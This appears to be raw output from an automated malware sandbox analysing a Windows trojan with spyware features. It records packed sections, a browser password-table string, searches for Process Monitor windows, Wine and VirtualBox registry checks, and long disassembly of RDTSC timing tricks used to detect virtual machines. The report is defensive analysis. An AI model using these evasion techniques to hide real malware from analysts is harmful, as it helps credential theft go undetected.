                Source: 3LUyRfIoKs.exeStatic PE information: Section: keznjtty ZLIB complexity 0.9945888044063365
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AD2070 CoCreateInstance,0_2_00AD2070
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 3LUyRfIoKs.exe, 00000000.00000003.2195058043.0000000005A11000.00000004.00000800.00020000.00000000.sdmp, 3LUyRfIoKs.exe, 00000000.00000003.2196251811.00000000059F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 3LUyRfIoKs.exeVirustotal: Detection: 59%
                Source: 3LUyRfIoKs.exeReversingLabs: Detection: 65%
                Source: 3LUyRfIoKs.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile read: C:\Users\user\Desktop\3LUyRfIoKs.exeJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: 3LUyRfIoKs.exeStatic file information: File size 1836544 > 1048576
                Source: 3LUyRfIoKs.exeStatic PE information: Raw size of keznjtty is bigger than: 0x100000 < 0x196600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeUnpacked PE file: 0.2.3LUyRfIoKs.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;keznjtty:EW;slutevoy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;keznjtty:EW;slutevoy:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: 3LUyRfIoKs.exeStatic PE information: real checksum: 0x1c1b56 should be: 0x1ca564
                Source: 3LUyRfIoKs.exeStatic PE information: section name:
                Source: 3LUyRfIoKs.exeStatic PE information: section name: .idata
                Source: 3LUyRfIoKs.exeStatic PE information: section name:
                Source: 3LUyRfIoKs.exeStatic PE information: section name: keznjtty
                Source: 3LUyRfIoKs.exeStatic PE information: section name: slutevoy
                Source: 3LUyRfIoKs.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404051 push ebp; ret 0_3_01404052
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404051 push ebp; ret 0_3_01404052
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406818 push eax; retf 0_3_0140681A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406818 push eax; retf 0_3_0140681A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404830 push esp; iretd 0_3_01404832
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404830 push esp; iretd 0_3_01404832
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404051 push ebp; ret 0_3_01404052
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404051 push ebp; ret 0_3_01404052
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406818 push eax; retf 0_3_0140681A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01406818 push eax; retf 0_3_0140681A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404830 push esp; iretd 0_3_01404832
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_3_01404830 push esp; iretd 0_3_01404832
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AF9703 push 1DE84D8Eh; mov dword ptr [esp], eax0_2_00AF9708
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AF9703 push esi; mov dword ptr [esp], 46DFD68Bh0_2_00AF970D
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00CC10C2 push 43FC49CAh; mov dword ptr [esp], ebx0_2_00CC1100
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00D810C3 push ebx; mov dword ptr [esp], 56034072h0_2_00D80FF0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00D810C3 push 5688568Fh; mov dword ptr [esp], eax0_2_00D810DC
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AFD0E3 push 240590BFh; mov dword ptr [esp], ecx0_2_00AFD11A
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BC40F2 push ebx; mov dword ptr [esp], eax0_2_00BC410F
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00BC40F2 push 1B1EFC95h; mov dword ptr [esp], ebx0_2_00BC415B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AFE0F9 push 4A8E9960h; mov dword ptr [esp], esi0_2_00AFE101
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AF80CB push 6B249466h; mov dword ptr [esp], eax0_2_00AF80D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AFC0D6 push edx; mov dword ptr [esp], ebp0_2_00AFC0DE
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AFF024 push esi; mov dword ptr [esp], 456EB857h0_2_00AFF02B
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AFC01C push edi; mov dword ptr [esp], ecx0_2_00AFC025
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00AD7069 push es; retf 0_2_00AD7074
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B77058 push 3F49ED56h; mov dword ptr [esp], ebx0_2_00B775A1
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B77058 push 53714E41h; mov dword ptr [esp], esp0_2_00B775B7
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B77058 push ecx; mov dword ptr [esp], edi0_2_00B775D0
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B77058 push edi; mov dword ptr [esp], 61F4C200h0_2_00B77676
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeCode function: 0_2_00B77058 push 17ADC507h; mov dword ptr [esp], ebx0_2_00B776B8
                Source: 3LUyRfIoKs.exeStatic PE information: section name: entropy: 7.987306923457494
                Source: 3LUyRfIoKs.exeStatic PE information: section name: keznjtty entropy: 7.953745081857698

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: AF8C5F second address: AF8C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: AF8C63 second address: AF8C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C59E2E second address: C59E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C66AA6 second address: C66AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C6705A second address: C6705F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C6705F second address: C6707E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F2830CF2D26h 0x00000009 jmp 00007F2830CF2D34h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C6707E second address: C6708A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C6708A second address: C67090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C67090 second address: C670B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F2830CEE57Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C670B4 second address: C670DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2830CF2D2Ch 0x00000008 jno 00007F2830CF2D26h 0x0000000e jmp 00007F2830CF2D2Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C670DA second address: C670E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C697B1 second address: C697B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C697B5 second address: C697D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D28A7h], ebx 0x0000000d push 00000000h 0x0000000f xor dword ptr [ebp+122D1C87h], ebx 0x00000015 push 4F9F0E8Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C698A4 second address: C6991C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F2830CF2D30h 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D20BDh], ecx 0x00000016 call 00007F2830CF2D29h 0x0000001b jmp 00007F2830CF2D38h 0x00000020 push eax 0x00000021 push edi 0x00000022 jmp 00007F2830CF2D35h 0x00000027 pop edi 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c jmp 00007F2830CF2D33h 0x00000031 mov eax, dword ptr [eax] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C6991C second address: C699AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 jo 00007F2830CEE56Ch 0x00000016 jg 00007F2830CEE566h 0x0000001c pop edx 0x0000001d pop eax 0x0000001e sbb si, 82B3h 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007F2830CEE568h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f mov dx, 7785h 0x00000043 mov dword ptr [ebp+122D287Dh], edi 0x00000049 push 00000000h 0x0000004b jmp 00007F2830CEE56Ah 0x00000050 push 00000003h 0x00000052 mov di, 550Fh 0x00000056 push 93989459h 0x0000005b jmp 00007F2830CEE56Eh 0x00000060 add dword ptr [esp], 2C676BA7h 0x00000067 mov ecx, 597FA4DEh 0x0000006c lea ebx, dword ptr [ebp+1244466Dh] 0x00000072 or dx, 8FB8h 0x00000077 mov dh, ACh 0x00000079 xchg eax, ebx 0x0000007a push ecx 0x0000007b pushad 0x0000007c push ecx 0x0000007d pop ecx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8BEB5 second address: C8BEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8A2FE second address: C8A309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8A309 second address: C8A30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8A8C0 second address: C8A8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8A8C6 second address: C8A8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8A8CA second address: C8A910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE56Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F2830CEE576h 0x00000011 jmp 00007F2830CEE570h 0x00000016 pushad 0x00000017 jmp 00007F2830CEE579h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8AFE8 second address: C8AFEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8AFEC second address: C8AFF7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8AFF7 second address: C8B006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F2830CF2D26h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8B006 second address: C8B00A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C54E0A second address: C54E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C54E0E second address: C54E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8B162 second address: C8B181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F2830CF2D26h 0x0000000a jmp 00007F2830CF2D35h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C8BD2A second address: C8BD59 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2830CEE566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F2830CEE56Ch 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 jng 00007F2830CEE566h 0x0000001b jng 00007F2830CEE566h 0x00000021 pop edi 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C5EE6A second address: C5EE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CF2D2Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C5EE78 second address: C5EE7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C5EE7E second address: C5EE94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2830CF2D2Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F2830CF2D26h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C5EE94 second address: C5EEBB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F2830CEE575h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jl 00007F2830CEE58Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C5EEBB second address: C5EEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2830CF2D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C5EEC5 second address: C5EED1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C5EED1 second address: C5EED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92B99 second address: C92BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CEE574h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92CE3 second address: C92CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C91531 second address: C91538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92F0C second address: C92F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92F12 second address: C92F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92F16 second address: C92F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92F1A second address: C92F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92F27 second address: C92F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C92F2D second address: C92F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
